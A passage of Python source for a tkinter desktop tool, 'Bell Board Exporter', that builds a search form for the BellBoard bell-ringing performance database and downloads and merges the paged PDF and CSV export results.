self.browseButton[tag] = BrowseButton(self.frame, options, text=text, startingFileName=startingFileName, browseType=browseType,
command=command,
state=self.state,
background=background,
padx=padx,
pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
def add_combobox(self, tag, menuOptions=None, width=None,
foreground="black", background=None, padx=None, pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
"""
Function to add a tkinter Combobox to the frame. Does this by creating an instance of the custom Combobox
wrapper class.
"""
if background is None:
background = self.backgroundColour
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
self.combobox[tag] = Combobox(self.frame, tag=tag, menuOptions=menuOptions, width=width,
state=self.state,
foreground=foreground, background=background, padx=padx, pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan,
sticky=sticky)
class Menu():
"""
The Menu class.
"""
def __init__(self, root):
self.menu = tk.Menu(root)
self.newMenuItem = tk.Menu(self.menu)
self.newMenuItem.add_command(label="Exit", command=root.destroy)
self.menu.add_cascade(label="File", menu=self.newMenuItem)
root.configure(menu=self.menu)
class Buffer():
"""
The Buffer class.
"""
def __init__(self):
self.buf = ""
self.buf_length = 0
def read(self):
"""
Read the buffer.
"""
self.buf_length = len(self.buf)
return self.buf
def flush(self):
"""
Flush the buffer.
"""
pass#self.buf = ""
def clear (self):
"""
Clear the buffer.
"""
self.buf = self.buf[self.buf_length:]
#self.buf = ""
def write(self, value):
"""
Write to the buffer.
"""
if value != "\n":
self.buf += "> " + value + "\n"
class Logger():
"""
The Logger class.
"""
def __init__(self, after, after_cancel, startingText="", logFileName="log.txt", logWriteRate=500, logging=True):
self.after = after
self.after_cancel = after_cancel
self.logFileName = logFileName
self.logWriteRate = logWriteRate
self.buffer = startingText
if self.buffer != "":
self.buffer += "\n"
self.logging = logging
self.after_id = None
with open(self.logFileName, "w+"):
pass # Create/clear the logging file
def write(self, text):
self.buffer += text
def clear(self):
self.buffer = ""
def start(self):
self.logging = True
self._write()
def stop(self):
self.logging = False
self.after_cancel(self.after_id)
def _write(self):
# Print to file here
if self.buffer != "" and self.logging == True:
with open(self.logFileName, 'a') as logFile:
logFile.write(self.buffer)
logFile.flush()
self.clear()
self.after_id = self.after(self.logWriteRate, self._write)
class BB(tk.Frame):
"""
The BB (BellBoard) class.
"""
def __init__(self, root):
self.programTitle = "Bell Board Exporter - v1.1.0"
if system() == "Windows":
self.font_large = ("Arial Bold", 18)
self.font_medium = ("Arial Bold", 14)
self.font_normal = ("Arial Bold", 10)
self.font_small = ("Arial", 8)
self.outputWindow_width = 82
self.outputWindow_height = 30
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_windows
elif system() == "Linux":
self.font_large = ("Arial Bold", 24)
self.font_medium = ("Arial Bold", 16)
self.font_normal = ("Arial Bold", 14)
self.font_small = ("Arial", 12)
self.outputWindow_width = 82
self.outputWindow_height = 38
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_linux
elif system() == "Darwin":
self.font_large = ("Arial Bold", 24)
self.font_medium = ("Arial Bold", 16)
self.font_normal = ("Arial Bold", 14)
self.font_small = ("Arial", 12)
self.outputWindow_width = 82
self.outputWindow_height = 38
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_mac
else:
self.font_large = ("Arial Bold", 24)
self.font_medium = ("Arial Bold", 16)
self.font_normal = ("Arial Bold", 14)
self.font_small = ("Arial", 12)
self.outputWindow_width = 82
self.outputWindow_height = 38
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_other
self.backgroundColour = "#474641"
self._findProgramDirectory()
tk.Frame.__init__(self, root)
root.configure(background=self.backgroundColour)
#root.geometry("")
self.windowSizeState()
root.title(self.programTitle)
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
menu = Menu(root)
self.canvas = tk.Canvas(root, borderwidth=0, highlightthickness=0, background=self.backgroundColour)
self.frame = tk.Frame(self.canvas, background=self.backgroundColour)
#self.vsb = tk.Scrollbar(root, orient="vertical", command=self.canvas.yview)
#self.canvas.configure(yscrollcommand=self.vsb.set)
#self.hsb = tk.Scrollbar(root, orient="horizontal", command=self.canvas.xview)
#self.canvas.configure(xscrollcommand=self.hsb.set)
if system() == "Windows":
self.canvas.bind_all("<MouseWheel>", self._onMousewheel_windows)
elif system() == "Linux":
self.canvas.bind_all("<MouseWheel>", self._onMousewheel_linux)
elif system() == "Darwin":
self.canvas.bind_all("<MouseWheel>", self._onMousewheel_mac)
else:
print("Warning: Could not determine OS platform, assuming Windows")
self.canvas.bind_all("<MouseWheel>", self._on_mousewheel_windows)
#self.vsb.pack(side="right", fill="y")
#self.hsb.pack(side="bottom", fill="x")
self.canvas.pack(side="left", fill="both", expand=True)
self.canvas.create_window((0, 0), window=self.frame, anchor="nw",
tags="self.frame")
self.canvas.bind("<Configure>", self._onResize)
self.frame.bind("<Configure>", self._onResize)
self.frame.bind("<Configure>", self._onFrameConfigure)
self.frame.grid_propagate=1
for i in range(7):
self.frame.columnconfigure(i, weight=1)
self.frame.columnconfigure(4, weight=0)
self.frame.columnconfigure(5, weight=0)
for i in range(27):
self.frame.rowconfigure(i, weight=1)
self.frame.pack(fill="both", expand=True)
#self.frame.grid(row=0, column=0, sticky="EW")
#self.frame.pack()
self.state = "normal"
self.populate()
self.downloader = Downloader(self.frame, self.options, self.advancedOptions)
self.populate_downloadOptions()
self.downloader.update_Download(self.downloadOptions)
def printing_thread(self, info_text):
"""
Function to put the printing of information, errors, etc, onto a seperate thread to the main thread.
"""
self.info_text = info_text
# Create Buffer class object
self.buf = Buffer()
self.log = Logger(after=self.after, after_cancel=self.after_cancel, startingText=self.programTitle,
logFileName=self.programDirectory+"log.txt", logWriteRate=500)
self.log.start()
# Set stdout to output to buf
# This allows us to display a virtual terminal that intercepts print statements from imported classes
sys.stdout = self.buf
# Check and refresh buf
self.print_rate = 150
self.print_rate_original = self.print_rate
self.read_std_out()
self.printing_thread = Thread(target=printing_thread, args=(self, self.info_text))
self.printing_thread.start()
def _findProgramDirectory(self):
# determine if application is a script file or frozen exe
if getattr(sys, 'frozen', False):
application_path = os.path.dirname(sys.executable)
elif __file__:
application_path = os.path.join(os.getcwd(), "")
self.programDirectory = application_path
if system() == "Darwin":
if ".app" in self.programDirectory:
while not self.programDirectory.endswith('.app'):
self.programDirectory = os.path.dirname(self.programDirectory)
self.programDirectory = os.path.dirname(self.programDirectory)
# Check to see if trailing slash
if self.programDirectory[-1] == "/" or self.programDirectory[-1] == "/":
pass
else:
self.programDirectory = os.path.join(self.programDirectory, "")
def _windowSizeState_windows(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
else:
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
root.state("zoomed")
def _windowSizeState_mac(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
#root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
root.geometry("")
else:
root.state("zoomed")
def _windowSizeState_linux(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
else:
root.attributes('-zoomed', True)
def _windowSizeState_other(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
else:
root.state("zoomed")
def _onResize(self, event):
"""
Resize the tkinter canvas and frame on the user changing the size of the window.
"""
self.width = event.width
self.height = event.height
self.canvas.configure(width=self.width, height=self.height)
self.frame.configure(width=self.width, height=self.height)
def _onFrameConfigure(self, event):
'''Reset the scroll region to encompass the inner frame'''
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def _onMousewheel_windows(self, event):
'''Enable frame scrolling for Windows'''
#self.canvas.xview_scroll(int(-1*(event.delta/120)), "units")
self.canvas.yview_scroll(int(-1*(event.delta/120)), "units")
def _onMousewheel_linux(self, event):
'''Enable frame scrolling for Linux'''
#self.canvas.xview_scroll(int(-1*(event.delta/120)), "units")
self.canvas.yview_scroll(int(-1*(event.delta/120)), "units")
def _onMousewheel_mac(self, event):
'''Enable frame scrolling for Mac'''
#self.canvas.xview_scroll(int(-1*(event.delta)), "units")
self.canvas.yview_scroll(int(-1*(event.delta)), "units")
def populate(self):
"""
Populate the tkinter frame with the bellboard search options and advanced search options.
"""
row_i = 0
col_i = 0
lbl_title = Label(self.frame, text=self.programTitle, font=self.font_large, background=self.backgroundColour,
padx=self.pad['x']['small'], column=col_i, row=row_i, columnspan=2)
row_i += 1
col_i = 0
self.options = BBOption(self.frame, self.state, self.backgroundColour, fontDefault=self.font_normal, pad=self.pad)
self.options.add_label(tag="association", text="Association:", padx=self.pad['x']['small'], column=col_i, row=row_i, columnspan=2)
self.options.add_entry(tag="association", width=32, padx=self.pad['x']['medium'], column=col_i, row=row_i+1, columnspan=2)
row_i += 1
row_i += 1
col_i = 0
self.options.add_label(tag="dateRungFrom", text="From (dd/mm/yyyy):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="dateRungFrom", width=10, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
self.options.add_label(tag="dateRungTo", text="To (dd/mm/yyyy):", padx=self.pad['x']['small'], column=col_i+1, row=row_i)
self.options.add_entry(tag="dateRungTo", width=10, padx=self.pad['x']['medium'], column=col_i+1, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.options.add_label(tag="place", text="Place:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="place", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
col_i += 1
self.options.add_label(tag="county", text="County (or Country):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="county", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
col_i += 1
self.options.add_label(tag="dedication", text="Dedication (or Address):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="dedication", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.options.add_label(tag="ringingLength", text="Lengths:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_checkbox(tag="allLengths", text="All Lengths", padx=self.pad['x']['medium'], checkState=True, column=col_i, row=row_i+1)
self.options.add_checkbox(tag="shortTouches", text="Short Touches", padx=self.pad['x']['medium'], column=col_i, row=row_i+2)
self.options.add_checkbox(tag="quarters", text="Quarter Peals", padx=self.pad['x']['medium'], column=col_i, row=row_i+3)
self.options.add_checkbox(tag="quartersOrLonger", text="Qtrs or Longer", padx=self.pad['x']['medium'], column=col_i, row=row_i+4)
self.options.add_checkbox(tag="dateTouches", text="Date Touches", padx=self.pad['x']['medium'], column=col_i, row=row_i+6)
self.options.add_checkbox(tag="halfPeals", text="Half Peals", padx=self.pad['x']['medium'], column=col_i, row=row_i+7)
self.options.add_checkbox(tag="peals", text="Peals", padx=self.pad['x']['medium'], column=col_i, row=row_i+8)
self.options.add_checkbox(tag="longLengths", text="Long Lengths", padx=self.pad['x']['medium'], column=col_i, row=row_i+9)
col_i += 1
self.options.add_label(tag="ringingMethod", text="Method (or Performance Title):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="ringingMethod", width=24, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
col_i += 1
self.options.add_label(tag="bellType", text="Type (Tower or Hand):", padx=self.pad['x']['small'], column=col_i, row=row_i)
bellTypeOptions = ["Tower and Hand", "Handbells Only", "Tower Bells Only"]
self.options.add_combobox(tag="bellType", menuOptions=bellTypeOptions, width=15, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
#self.options.add_checkbox(tag="towerAndHand", text="Tower and Hand", column=col_i, row=row_i+1)
#self.options.add_checkbox(tag="handbellsOnly", text="Handbells Only", column=col_i, row=row_i+2)
#self.options.add_checkbox(tag="towerBellsOnly", text="Tower Bells Only", column=col_i, row=row_i+3)
row_i += 9
row_i += 1
col_i = 0
self.options.add_label(tag="ringerName", text="Ringer:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="ringerName", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
self.options.add_label(tag="conductorName", text="Conductor:", padx=self.pad['x']['small'], column=col_i+1, row=row_i)
self.options.add_entry(tag="conductorName", width=16, padx=self.pad['x']['medium'], column=col_i+1, row=row_i+1)
self.options.add_label(tag="composerName", text="Composer:", padx=self.pad['x']['small'], column=col_i+2, row=row_i)
self.options.add_entry(tag="composerName", width=16, padx=self.pad['x']['medium'], column=col_i+2, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.advancedOptions = BBOption(self.frame, self.state, self.backgroundColour, fontDefault=self.font_normal, pad=self.pad)
self.advancedOptions.add_label(tag="bellRung", text="Bell Rung (e.g. 2 or n-1):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.advancedOptions.add_entry(tag="bellRung", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
self.advancedOptions.add_label(tag="otherRinger", text="Other Ringer:", padx=self.pad['x']['small'], column=col_i+1, row=row_i)
self.advancedOptions.add_entry(tag="otherRinger", width=16, padx=self.pad['x']['medium'], column=col_i+1, row=row_i+1)
self.advancedOptions.add_label(tag="otherRingersBell", text="Other Ringer's Bell:", padx=self.pad['x']['small'], column=col_i+2, row=row_i)
self.advancedOptions.add_entry(tag="otherRingersBell", width=16, padx=self.pad['x']['medium'], column=col_i+2, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.advancedOptions.add_label(tag="compDetails", text="Composition Details:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.advancedOptions.add_entry(tag="compDetails", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.advancedOptions.add_label(tag="footnote", text="Footnote (Contains Word):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.advancedOptions.add_entry(tag="footnote", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
row_i -= 3
col_i = 1
self.advancedOptions.add_checkbox(tag="withPhoto", text="With Photo", padx=self.pad['x']['small'], column=col_i, row=row_i+1)
self.advancedOptions.add_checkbox(tag="withComposition", text="With Composition", padx=self.pad['x']['small'], column=col_i, row=row_i+2)
self.advancedOptions.add_checkbox(tag="machineReadableComposition", text="Machine-Readable Composition", padx=self.pad['x']['small'], column=col_i, row=row_i+3)
self.advancedOptions.add_checkbox(tag="excludedNonCompliantPerformances", text="Exclude Non-Compliant Performances", padx=self.pad['x']['small'], column=col_i, row=row_i+4)
self.advancedOptions.add_checkbox(tag="ringerIsConductor", text="Ringer is Conductor", padx=self.pad['x']['small'], column=col_i, row=row_i+5)
self.advancedOptions.add_checkbox(tag="ringerIsStrapper", text="Ringer is Strapper", padx=self.pad['x']['small'], column=col_i, row=row_i+6)
row_i += 6
row_i -= 1
col_i = 0
self.advancedOptions.add_label(tag="orderBy", text="Order By:", padx=self.pad['x']['small'], column=col_i, row=row_i)
menuOptions = ["Date Rung", "Date Submitted", "Place", "Length",
"Duration", "Peal Speed", "Method (or Title)",
"Score From Likes", "Number of Likes", "Performance Views"]
self.advancedOptions.add_combobox(tag="orderByMenu", menuOptions=menuOptions, width=15, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
#self.advancedOptions.add_checkbox(tag="orderByDateRung", text="Date Rung", column=col_i+1, row=row_i+1)
#self.advancedOptions.add_checkbox(tag="orderByDateSubmitted", text="Date Submitted", column=col_i, row=row_i+1)
#self.advancedOptions.add_checkbox(tag="orderByPlace", text="Place", column=col_i+1, row=row_i+2)
#self.advancedOptions.add_checkbox(tag="orderByLength", text="Length", column=col_i, row=row_i+2)
#self.advancedOptions.add_checkbox(tag="orderByDuration", text="Duration", column=col_i+1, row=row_i+3)
#self.advancedOptions.add_checkbox(tag="orderByPealSpeed", text="Peal Speed", column=col_i, row=row_i+3)
#self.advancedOptions.add_checkbox(tag="orderByMethod(orTitle)", text="Method (or Title)", column=col_i+1, row=row_i+4)
#self.advancedOptions.add_checkbox(tag="orderByScoreFromLikes", text="Score From Likes", column=col_i, row=row_i+4)
#self.advancedOptions.add_checkbox(tag="orderByNumberOfLikes", text="Number of Likes", column=col_i+1, row=row_i+5)
#self.advancedOptions.add_checkbox(tag="orderByPerformanceViews", text="Performance Views", column=col_i, row=row_i+5)
row_i += 1#1
self.advancedOptions.add_checkbox(tag="reverseResults", text="Reverse Order of Results", checkState=True, padx=self.pad['x']['small'], column=col_i, row=row_i+1)
def populate_downloadOptions(self):
"""
Populate the tkinter frame with the download options.
"""
col_i = 4
row_i = 0
columnSpan_max = 4
self.downloadOptions = BBOption(self.frame, self.state, self.backgroundColour, fontDefault=self.font_normal, pad=self.pad)
self.downloadOptions.add_label(tag="downloadOptions", text="Download Options:", font=self.font_medium, padx=self.pad['x']['small'],
column=col_i, row=row_i, columnspan=columnSpan_max)
row_i += 1
self.downloadOptions.add_label(tag="savePath", text="Save Path and File Name:", padx=self.pad['x']['small'], column=col_i, row=row_i, columnspan=columnSpan_max)
self.downloadOptions.add_entry(tag="savePath", sanatiseEntry=False, width=56, padx=self.pad['x']['medium'], column=col_i, row=row_i+1, columnspan=columnSpan_max)
self.downloadOptions.entry["savePath"].set(self.programDirectory)
row_i += 2
#self.browseDirButton = BrowseButton(self.frame, self.downloadOptions, text="Select Path", startingFileName=self.programDirectory, browseType="browsePath",
# command=self.downloadOptions.entry["savePath"].set,
# background=self.backgroundColour,
# pady=self.pad['y']['small'],
# column=col_i, row=row_i)
self.downloadOptions.add_browseButton(tag="browseFileButton", options=self.downloadOptions, text="Select Path and Filename", startingFileName=self.programDirectory, browseType="selectFile",
command=self.downloadOptions.entry["savePath"].set,
background=self.backgroundColour,
padx=self.pad['x']['medium'],
pady=self.pad['y']['small'],
column=col_i, row=row_i, columnspan=columnSpan_max)
self.downloadOptions.add_checkbox(tag="lengthAutomaticallyOnEndOfFilename", text='Length on end of filename (e.g. "Name_allLengths.pdf")', checkState=True,
padx=self.pad['x']['small'], column=col_i, row=row_i+1, columnspan=columnSpan_max)
row_i += 1
self.downloadOptions.add_checkbox(tag="downloadPDF", text="Download as PDF", checkState=True, padx=self.pad['x']['small'],
column=col_i, row=row_i+1, columnspan=1)
self.downloadOptions.add_checkbox(tag="downloadCSV", text="Download as CSV", checkState=True, padx=self.pad['x']['small'],
column=col_i+1, row=row_i+1, columnspan=1)
row_i += 2
self.downloadOptions.add_button(tag="downloadbutton", text="Download", options=self.options, command=self.downloader.download_start,
padx=self.pad['x']['medium'],column=col_i, row=row_i, columnspan=1)
row_i += 1
self.info_text = Text(self.frame, startingText=self.programTitle, column=col_i, row=row_i, width=self.outputWindow_width, height=self.outputWindow_height,
columnspan=columnSpan_max, rowspan=23, padx=self.pad['x']['small'], pady=self.pad['y']['medium'], sticky="NESW")
def read_std_out(self):
"""Put stdout messages into the info_box. Called once, auto-refreshes"""
read = self.buf.read()
if read:
self.add_info(read)
self.buf.clear()#flush()
self.after(self.print_rate, self.read_std_out) # Call this again soon
def add_info(self, info):
"""
Add informational message to info box. Use instead of print().
arguments: (str) info
effects: add line with info printed to screen in info box
"""
# A basic bit of sanatising:
info = info.rstrip()
info = str(info) + "\n"
if self.log.logging == True:
self.log.write(info)
self.info_text.info_text.config(state=NORMAL)
self.info_text.info_text.insert(END, info)
self.info_text.info_text.see(END)
self.info_text.info_text.config(state=DISABLED)
def reset_print_rate(self):
"""
Reset the print rate to its original value.
"""
self.print_rate = self.print_rate_original
class DownloadWorkerThread(threading.Thread):
"""
A worker thread to download the results of a specific BellBoard search.
Input is done by placing a list of the URL and file save name into the queue
passed in download_q.
The thread is stopped by calling its join() method.
"""
def __init__(self, download_q):
super(DownloadWorkerThread, self).__init__()
self.download_q = download_q
self.stoprequest = threading.Event()
def run(self):
"""
As long as we weren't asked to stop, try to take new tasks from the queue. The tasks are
taken with a blocking 'get', so no CPU cycles are wasted while waiting. Also, 'get' is
given a timeout, so stoprequest is always checked, even if there's nothing in the queue.
"""
while not self.stoprequest.isSet():
try:
self.url, self.saveName = self.download_q.get(True, 0.05)
self._dowloadFile()
except queue.Empty:
continue
def join(self, timeout=None):
self.stoprequest.set()
super(DownloadWorkerThread, self).join(timeout)
def _dowloadFile(self):
"""
Function to do the actual download. Kept seperate to allow for multithreading.
"""
maxDownloadAttmpts = 5
page = 1
paging = True
while paging:
downloadAttmptCount = 0
while downloadAttmptCount < maxDownloadAttmpts:
try:
myfile = requests.get(self.url+"&page={}".format(str(page)))
downloadAttmptCount = maxDownloadAttmpts + 1
except requests.exceptions.RequestException as err:
print("Error in downloading file:\n "+err+"\n Trying download again...")
downloadAttmptCount += 1
if downloadAttmptCount == maxDownloadAttmpts:
print("Error: Could not download file in allowed number of attempts, please try again")
elif downloadAttmptCount == maxDownloadAttmpts + 1:
if myfile.text == "":
paging = False
else:
if self.saveName[-3:] == "csv":
if page == 1:
print("Downloading page 1 of BellBoard search results into output CSV")
with open(self.saveName, 'wb') as fileOutput:
fileOutput.write(myfile.content)
else:
print("Merging page {} of BellBoard results into output CSV".format(page))
with open(self.saveName, 'ab') as fileOutput:
fileOutput.write(myfile.content)
elif self.saveName[-3:] == "pdf":
if page == 1:
print("Downloading page 1 of BellBoard search results into output PDF")
with open(self.saveName, 'wb') as fileOutput:
fileOutput.write(myfile.content)
else:
if self.saveName[-3:] == "pdf":
print("Merging page {} of BellBoard results into output PDF".format(page))
merger = PdfFileMerger()
merger.append(PdfFileReader(open(self.saveName, 'rb')))
merger.append(PdfFileReader(io.BytesIO(myfile.content)))
merger.write(self.saveName)
page += 1
print("{} downloaded and merged!".format(self.saveName))
class Downloader():
"""
Downloader class.
"""
def __init__(self, frame, options, advancedOptions, downloadOptions=None):
self.frame = frame
self.options = options
self.advancedOptions = advancedOptions
self.downloadOptions = downloadOptions
def update_Download(self, downloadOptions):
"""
Function to update the Downloader class object. Used to allow the class to be initialised without
the download options being available, as they can be passed in with this function later.
"""
self.downloadOptions = downloadOptions
def download_start(self):
"""
Wrapper around download function to allow it to run and wait for all threads to have finished
without causing the main window of the program to freeze up.
"""
mainDownloadThread = Thread(target=self.download)
mainDownloadThread.start()
def download(self):
"""
Function to download files. Goes through the download options and downloads files for those options, with a seperate
file for each ringing length, and for PDF and CSV, depending on given options.
"""
if self.options.entry["ringerName"].get() == "" and self.options.entry["conductorName"].get() == "" and self.options.entry["composerName"].get() == "":
print('Error: Need at least one of Ringer, Conductor, or Composer to be filled in!')
else:
self.options.updateState("disabled")
self.advancedOptions.updateState("disabled")
self.downloadOptions.updateState("disabled")
self.urlOptions = {"Association":self.options.entry["association"].get(sanatise=False),
"From":self.options.entry["dateRungFrom"].get(sanatise=False),
"To":self.options.entry["dateRungTo"].get(sanatise=False),
"Place":self.options.entry["place"].get(sanatise=False),
"County":self.options.entry["county"].get(sanatise=False),
"Dedication":self.options.entry["dedication"].get(sanatise=False),
"All Lengths":self.options.checkbox["allLengths"].get(),
"Short Touches":self.options.checkbox["shortTouches"].get(),
"Quarter Peals":self.options.checkbox["quarters"].get(),
"Qtrs or Longer":self.options.checkbox["quartersOrLonger"].get(),
"Date Touches":self.options.checkbox["dateTouches"].get(),
"Half Peals":self.options.checkbox["halfPeals"].get(),
"Peals":self.options.checkbox["peals"].get(),
"Long Lengths":self.options.checkbox["longLengths"].get(),
"Method":self.options.entry["ringingMethod"].get(sanatise=False),
"Bell Type":self.options.combobox["bellType"].get(),
"Ringer Name":self.options.entry["ringerName"].get(sanatise=False),
"Conductor Name":self.options.entry["conductorName"].get(sanatise=False),
"Composer Name":self.options.entry["composerName"].get(sanatise=False),
"Bell Rung":self.advancedOptions.entry["bellRung"].get(sanatise=False),
"Other Ringer":self.advancedOptions.entry["otherRinger"].get(sanatise=False),
"Other Ringer's Bell":self.advancedOptions.entry["otherRingersBell"].get(sanatise=False),
"Composition Details":self.advancedOptions.entry["compDetails"].get(sanatise=False),
"Footnote":self.advancedOptions.entry["footnote"].get(),
"With Photo":self.advancedOptions.checkbox["withPhoto"].get(),
"With Composition":self.advancedOptions.checkbox["withComposition"].get(),
"Machine-Readable Composition":self.advancedOptions.checkbox["machineReadableComposition"].get(),
"Exclude Non-Compliant Performances":self.advancedOptions.checkbox["excludedNonCompliantPerformances"].get(),
"Ringer is Conductor":self.advancedOptions.checkbox["ringerIsConductor"].get(),
"Ringer is Strapper":self.advancedOptions.checkbox["ringerIsStrapper"].get(),
"Order By":self.advancedOptions.combobox["orderByMenu"].get(),
"Reverse Results":self.advancedOptions.checkbox["reverseResults"].get(),
"PDF":self.downloadOptions.checkbox["downloadPDF"].get(),
"CSV":self.downloadOptions.checkbox["downloadCSV"].get(),
"Length Automatically on End of Filename":self.downloadOptions.checkbox["lengthAutomaticallyOnEndOfFilename"].get()}
self.baseUrl = "https://bb.ringingworld.co.uk/export.php?"
# Options
url = self.baseUrl + "association=" + self.options.entry["association"].get()
url += "&from=" + self.options.entry["dateRungFrom"].get()
url += "&to=" + self.options.entry["dateRungTo"].get()
url += "&place=" + self.options.entry["place"].get()
url += "®ion=" + self.options.entry["county"].get()
url += "&address=" + self.options.entry["dedication"].get()
url += "&title=" + self.options.entry["ringingMethod"].get()
if self.options.combobox["bellType"].get() == "Tower and Hand":
pass
elif self.options.combobox["bellType"].get() == "Handbells Only":
url += "&bells_type=hand"
elif self.options.combobox["bellType"].get() == "Tower Bells Only":
url += "&bells_type=tower"
url += "&ringer=" + self.options.entry["ringerName"].get()
url += "&conductor=" + self.options.entry["conductorName"].get()
url += "&composer=" + self.options.entry["composerName"].get()
# Advanced Options
url += "&ringer_bell=" + self.advancedOptions.entry["bellRung"].get()
url += "&ringer2=" + self.advancedOptions.entry["otherRinger"].get()
url += "&ringer2_bell=" + self.advancedOptions.entry["otherRingersBell"].get()
url += "&details=" + self.advancedOptions.entry["compDetails"].get()
url += "&footnote=" + self.advancedOptions.entry["footnote"].get()
for advancedOptionsCheckbox in self.advancedOptions.checkbox:
if self.advancedOptions.checkbox[advancedOptionsCheckbox].get() == True:
if advancedOptionsCheckbox == "withPhoto":
url += "&has_media"
print("Info: Currently can only download the performances but not their photos!")#cannot download performance photos, only the performances!")
if advancedOptionsCheckbox == "withComposition":
url += "&with_composition"
if advancedOptionsCheckbox == "machineReadableComposition":
url += "&machine_comp=1"
if advancedOptionsCheckbox == "excludedNonCompliantPerformances":
url += "&compliant"
if advancedOptionsCheckbox == "ringerIsConductor":
url += "&ringer_is_conductor"
if advancedOptionsCheckbox == "ringerIsStrapper":
url += "&ringer_is_strapper"
if self.advancedOptions.combobox["orderByMenu"].get() == "Date Rung":
url += "&order="
elif self.advancedOptions.combobox["orderByMenu"].get() == "Date Submitted":
url += "&order=newest"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Place":
url += "&order=place"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Length":
url += "&order=changes"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Duration":
url += "&order=duration"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Peal Speed":
url += "&order=peal_speed"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Method (or Title)":
url += "&order=title"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Score From Likes":
url += "&order=Score"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Number of Likes":
url += "&order=likes"
elif self.advancedOptions.combobox["orderByMenu"].get() == "Performance Views":
url += "&order=views"
if self.advancedOptions.checkbox["reverseResults"].get() is True:
url += "+reverse"
# Print options being used
downloading_output_print = ""
downloading_output_print += "Using Options:"
for key in self.urlOptions:
if self.urlOptions[key] == "" or self.urlOptions[key] == False:
pass
else:
downloading_output_print += "\n {}: {}".format(key, self.urlOptions[key])
print(downloading_output_print)
# Create a single input and a single output queue for all threads.
download_q = queue.Queue()
numberOfFilesToDownload = 0
print("Files to Download:")
self.urlBefore = "{}".format(url)
for length in self.options.checkbox:
url_andSaveName = []
if self.options.checkbox[length].get() == True:
if self.downloadOptions.checkbox["lengthAutomaticallyOnEndOfFilename"].get():
lengthName = "_"+length
else:
lengthName = ""
saveName=self.downloadOptions.entry["savePath"].get()+lengthName
url += "&length="
if length == "allLengths":
pass
# Pass with addition to URL
elif length == "shortTouches":
url += "short"
elif length == "quarters":
url += "quarter"
elif length == "quartersOrLonger":
url += "q-or-p"
elif length == "dateTouches":
url += "date"
elif length == "halfPeals":
url += "half"
elif length == "peals":
url += "peal"
elif length == "longLengths":
url += "long"
if self.downloadOptions.checkbox["downloadPDF"].get() == True:
# Download PDF
print(" {}".format(saveName+'.pdf'))
url_andSaveName.append(url+"&fmt="+"pdf")
if saveName[-1] == os.path.join(" ", "")[-1]:
print(' Warning, filename not given, using "bellBoardDefault" instead!')
url_andSaveName.append(saveName+"bellBoardDefault"+".pdf")
else:
url_andSaveName.append(saveName+".pdf")
